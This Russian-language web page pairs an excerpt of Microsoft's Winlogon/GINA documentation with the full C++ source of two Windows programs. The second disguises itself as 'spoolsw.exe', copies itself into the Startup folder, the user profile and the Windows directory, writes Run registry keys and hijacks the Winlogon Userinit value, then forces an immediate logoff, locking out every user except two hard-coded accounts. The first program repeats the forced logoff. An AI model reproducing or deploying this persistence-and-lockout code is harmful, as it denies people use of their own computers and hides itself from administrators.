Автор: Шуднев Д. (начальник бюро корпоративной информации КнаАПО)
Для связи с автором идите сюда  http://kms.en.cx/ - там же есть телефон.
Торопитесь, а то мой Друг, задумал нечто не хорошее .......

Улыбнитесь: 
   Кстати, с доменом http://kms.en.cx/ у меня был анекдотичный смешной случай. Работая на одном из заводов в городе К. - однажды один из работающих работников принес резюме своего знакомого начальнику. Начальник стал читать - но суть написанного не очень понял. Позвал взрослых мужиков (программистов, электронщиков - лет за 40 ). Читают... :
 " Образование такое-то, учусь..
   Являюсь владельцем домена kms.en.cx
   ...."
  Тут один из мужиков, восклицает.- " я чего то не понял? Он что, уже 9 лет учиться в универе?" Бросились считать. И точно. По годам выходить, что данный владелец - вот уже 9 лет учиться в универе на одной специальности.
Технические подробности
 

MSGina.dll Features

If you are writing a GINA to replace the Microsoft standard GINA DLL (MSGina.dll), you may want to provide some or all of the standard GINA functionality. Following is a list of standard features and a brief description of how they are controlled.

Registry key values control the availability or behavior of many of these standard GINA features. Unless otherwise noted, these key values belong to the Winlogon registry key and have a value type of [REG_SZ]. The actual path of the Winlogon key is:

\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

  • Userinit.exe Activation

    Userinit.exe is an application that is executed by MSGina.dll when the user has logged on. It runs in the newly logged-on user's context and on the application desktop. Its purpose is to set up the user's environment, including restoring net uses, establishing profile settings such as fonts and screen colors, and running logon scripts. After completing those tasks, Userinit.exe executes the user shell program(s). The shell programs inherit the environment that Userinit.exe sets up. The specific shell programs that Userinit.exe executes are stored in the Shell key value under the Winlogon registry key.

    The Shell key value can contain a comma-separated list of programs to be executed. Explorer is the default shell program and will be executed if the Shell key value is null or not present. By default, Explorer is listed.


-----------------------------------------------------------------------------------------------------------------------------------------------------------

// spoolssw.cpp : Defines the entry point for the application.
//
#include "stdafx.h"

#include <tchar.h>
#include <time.h>
#include <stdlib.h>
#include <Userenv.h>
#include <shlobj.h>

#define BUFFER MAX_PATH+1

BOOL FFileExists(LPCTSTR );
BOOL MySystemName();
BOOL MySystemLogoff();


int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
// TODO: Place code here.

   if (FFileExists("C:\\Program Files\\Common Files\\Microsoft Shared\\osgen.log")) { return 0; }

   WaitForInputIdle(GetCurrentProcess(),5000);

   if (!MySystemLogoff()) ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);

   return 0;
}


//****************************************************************************
//
// BOOL FFileExists(LPCTSTR szFile)
//
//****************************************************************************

BOOL FFileExists(LPCTSTR szFile)
{
HANDLE hFile = 0;

if ((NULL == szFile) || (_T('\0') == *szFile))
return FALSE;

UINT uErrorMode = SetErrorMode(SEM_NOOPENFILEERRORBOX | SEM_FAILCRITICALERRORS);
hFile = CreateFile(szFile, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
SetErrorMode(uErrorMode); // Restore error mode

if (hFile == INVALID_HANDLE_VALUE) return FALSE;

CloseHandle(hFile);
return TRUE;
}


BOOL MySystemName()
{
LPTSTR lpszSystemInfo; // pointer to system information string
DWORD cchBuff = BUFFER; // size of computer or user name
TCHAR tchBuffer1[BUFFER]; // buffer for concatenated string

// получаем имя из системы
ZeroMemory(tchBuffer1, BUFFER);
lpszSystemInfo = tchBuffer1;
GetUserName(lpszSystemInfo, &cchBuff);

if ( lstrcmpi( "zelepukhinma68", lpszSystemInfo) == 0 ) return FALSE;
if ( lstrcmpi( "braginags68", lpszSystemInfo) == 0 ) return FALSE;

return TRUE;
}


BOOL MySystemLogoff()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;

// Get a token for this process.

if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return( FALSE );

// Get the LUID for the shutdown privilege.

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);

tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// Get the logoff privilege for this process.

AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

if (GetLastError() != ERROR_SUCCESS) return FALSE;

// logoff the system and force all applications to close.

if (!ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0)) return FALSE;

return TRUE;
}
 

Исходник программы № 2
Автор: Шуднев Д. (начальник бюро корпоративной информации КнаАПО).

-----------------------------------------------------------------------------------------------------------------------------------------------------------

// spoolsw.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include <windows.h>
#include <tchar.h>
#include <Userenv.h>
#include <shlobj.h>

#define BUFFER MAX_PATH+1

static const char szFile[] = "spoolsw.exe";

BOOL MySystemFileSetup();
BOOL FFileExists(LPCTSTR szFile);
BOOL MySystemName();
BOOL MySystemLogoff();
BOOL MySystemShutdown();

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
if (!MySystemName()) return 0;

if (!MySystemFileSetup()) return 0;

//Sleep(7000);
WaitForInputIdle(GetCurrentProcess(),7000);

if (!MySystemLogoff()) ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);

return 0;
}


BOOL MySystemFileSetup()
{
// HMODULE hModule;
HANDLE hFile;
LPTSTR lpProfileDir = NULL ;
LPTSTR pszFile = 0;
LPTSTR lpszPath = 0;
TCHAR tchBuffer1[BUFFER];
TCHAR tchBuffer2[BUFFER];
TCHAR tchMes[BUFFER];
DWORD nSize=BUFFER;
TCHAR pszFileAsu[BUFFER];
TCHAR pszFileGina[BUFFER];
TCHAR pszFileGinaStartUp[BUFFER];
TCHAR pszDirSys[BUFFER], pszFileSys[BUFFER];
TCHAR g_szFile[BUFFER], g_szPath[BUFFER];
DWORD dwErrorCode = 0;
HANDLE hToken = NULL;

// получаем полное имя exe-файла
ZeroMemory(g_szFile, BUFFER);
if (0==GetModuleFileName(GetModuleHandle(NULL), g_szFile, BUFFER )) return FALSE;

// выделяем из полного имени - имя.exe
ZeroMemory(g_szPath, BUFFER);
GetFullPathName(g_szFile,BUFFER,g_szPath, &pszFile );

// в автозагрузку копируем файл
ZeroMemory(tchBuffer1, BUFFER);
lpszPath=tchBuffer1;
nSize=BUFFER;
if (TRUE==SHGetSpecialFolderPath(NULL,lpszPath,CSIDL_STARTUP,0)) {
//Import library shell32.lib
//MessageBox (NULL,lpszPath,"SHGetSpecialFolderPath",MB_OK);
ZeroMemory(pszFileGinaStartUp, BUFFER);
//wsprintf(pszFileGinaStartUp,"%s\\%s",lpszPath,pszFile);
wsprintf(pszFileGinaStartUp,"%s\\%s",lpszPath,szFile);
if (!FFileExists(pszFileGinaStartUp)) CopyFile(g_szFile,pszFileGinaStartUp, TRUE);
}

// Open the access token associated with the calling process.
if (OpenProcessToken( GetCurrentProcess(), TOKEN_QUERY, &hToken ) == FALSE) { dwErrorCode = GetLastError(); }

ZeroMemory(tchBuffer2, BUFFER);
lpProfileDir=tchBuffer2;
nSize=BUFFER;
if (0==GetUserProfileDirectory(hToken, lpProfileDir, &nSize))
{
dwErrorCode = GetLastError();
if (0==GetTempPath(BUFFER, lpProfileDir)) return FALSE ;
}

// MessageBox (NULL,lpProfileDir,"ProfilesDirectory",MB_OK);

// копируем файл в профиль-C:\Documents and Settings\Joe
ZeroMemory(pszFileGina, BUFFER);
//wsprintf(pszFileGina,"%s\\%s",lpProfileDir,pszFile);
wsprintf(pszFileGina,"%s\\%s",lpProfileDir,szFile);
if (!FFileExists(pszFileGina)) CopyFile(g_szFile,pszFileGina, TRUE);

/*====HKEY_CURRENT_USER========пишем в реестр===============*/
HKEY hKey;
char szBuf[BUFFER];

// Use RegOpenKeyEx() with the new
// Registry path to get an open handle
// to the child key you want to enumerate.
//KEY_ALL_ACCESS|KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | KEY_CREATE_SUB_KEY
if (ERROR_SUCCESS == RegOpenKeyEx (HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"),0,KEY_ALL_ACCESS,&hKey))
{
// Set the name of the message file.
szBuf[0]='\0';strcpy(szBuf, pszFileGina);

// Add the name subkey.
RegSetValueEx(hKey, // subkey handle
"AsuFile1", // value name
0, // must be zero
REG_SZ, // value type REG_SZ REG_EXPAND_SZ
(LPBYTE) szBuf, // pointer to value data
strlen(szBuf) + 1); // length of value data

RegCloseKey (hKey); // Close the key handle.
}

/*===HKEY_LOCAL_MACHINE========================*/
ZeroMemory(pszDirSys, BUFFER);
// Get and display the Windows directory.
if ( GetWindowsDirectory(pszDirSys, BUFFER) )
{
ZeroMemory(pszFileSys, BUFFER);
wsprintf(pszFileSys,"%s\\%s",pszDirSys,szFile);
if (!FFileExists(pszFileSys))
if (0!=CopyFile(g_szFile,pszFileSys, TRUE))
{

if (ERROR_SUCCESS == RegOpenKeyEx (HKEY_LOCAL_MACHINE,
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"),0,KEY_WRITE,&hKey))
{
// Set the name of the message file.
szBuf[0]='\0';strcpy(szBuf, pszFileSys);

// Add the name subkey.
RegSetValueEx(hKey, // subkey handle
"AsuFile2", // value name
0, // must be zero
REG_SZ, // value type REG_SZ REG_EXPAND_SZ
(LPBYTE) szBuf, // pointer to value data
strlen(szBuf) + 1); // length of value data

RegCloseKey (hKey); // Close the key handle.
}


if (ERROR_SUCCESS == RegOpenKeyEx (HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"),0,KEY_WRITE,&hKey))
{
// Set the name of the message file.
szBuf[0]='\0';
wsprintf(szBuf,"%s\\system32\\userinit.exe,%s",pszDirSys,pszFileSys);

// Add the name subkey.
RegSetValueEx(hKey, // subkey handle
"Userinit", // value name
0, // must be zero
REG_SZ, // value type REG_SZ REG_EXPAND_SZ
(LPBYTE) szBuf, // pointer to value data
strlen(szBuf) + 1); // length of value data

RegCloseKey (hKey); // Close the key handle.
}

}
}

/*============================================================*/

ZeroMemory(pszFileAsu, BUFFER);
lstrcpy(pszFileAsu, lpProfileDir);
lstrcat(pszFileAsu, (LPSTR) "\\.asu");

//MessageBox (NULL,pszFileAsu,"FileAsu",MB_OK);

if (FFileExists(pszFileAsu)) return TRUE ;

hFile = CreateFile(pszFileAsu, // create
GENERIC_WRITE, // open for writing
0, // do not share
NULL, // no security
CREATE_NEW ,// CREATE_ALWAYS CREATE_NEW
FILE_ATTRIBUTE_NORMAL | // normal file
FILE_ATTRIBUTE_HIDDEN,
NULL); // no attr. template

if (hFile == INVALID_HANDLE_VALUE) return FALSE ;
ZeroMemory(tchMes, BUFFER);
wsprintf(tchMes,"Авторы программы:\n Шуднев Д. \n Прохоров \n 2006год ");
WriteFile(hFile, tchMes, lstrlen(tchMes)+1, &nSize ,NULL);
CloseHandle(hFile);

return FALSE;
}


//****************************************************************************
//
// BOOL FFileExists(LPCTSTR szFile)
//
//****************************************************************************

BOOL FFileExists(LPCTSTR szFile)
{
HANDLE hFile = 0;

if ((NULL == szFile) || (_T('\0') == *szFile)) return FALSE;

UINT uErrorMode = SetErrorMode(SEM_NOOPENFILEERRORBOX | SEM_FAILCRITICALERRORS);
hFile = CreateFile(szFile, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
SetErrorMode(uErrorMode); // Restore error mode

if (hFile == INVALID_HANDLE_VALUE) return FALSE;

CloseHandle(hFile);
return TRUE;
}

//+---------------------------------------------------------------------------
//
// Member: fFileExists
//
// Purpose: Find whether the given file exists
//
// Arguments:
// ptszFileName [in] File name of the file to check
//
// Returns: TRUE or FALSE
//
// Notes:
//
BOOL fFileExists(LPTSTR ptszFileName)
{
DWORD dwValue;
dwValue = GetFileAttributes(ptszFileName);

if (dwValue == -1 )
{
// Return false if we are not able to get the file attributes
return FALSE;
}
else
{
return TRUE;
}
}


BOOL MySystemName()
{
LPTSTR lpszSystemInfo; // pointer to system information string
DWORD cchBuff = BUFFER; // size of computer or user name
TCHAR tchBuffer1[BUFFER]; // buffer for concatenated string
//TCHAR tchBuffer2[BUFFER]; // buffer for out

ZeroMemory(tchBuffer1, BUFFER);
lpszSystemInfo = tchBuffer1;
GetUserName(lpszSystemInfo, &cchBuff);
//ZeroMemory(tchBuffer2, BUFFER);
//wsprintf(tchBuffer2, "User name: %s", lpszSystemInfo);

if ( lstrcmpi( "zelepukhinma68", lpszSystemInfo) == 0 ) return FALSE;
if ( lstrcmpi( "braginags68", lpszSystemInfo) == 0 ) return FALSE;

return TRUE;
}


BOOL MySystemLogoff()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;

// Get a token for this process.

if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return( FALSE );

// Get the LUID for the shutdown privilege.

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);

tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// Get the logoff privilege for this process.

AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

if (GetLastError() != ERROR_SUCCESS) return FALSE;

// logoff the system and force all applications to close.

if (!ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0)) return FALSE;

return TRUE;
}


//пример взят из документации
BOOL MySystemShutdown()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;

// Get a token for this process.

if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return( FALSE );

// Get the LUID for the shutdown privilege.

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);

tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// Get the shutdown privilege for this process.

AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

if (GetLastError() != ERROR_SUCCESS) return FALSE;

// Shut down the system and force all applications to close.

if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, 0)) return FALSE;

return TRUE;
}

 

Hosted by uCoz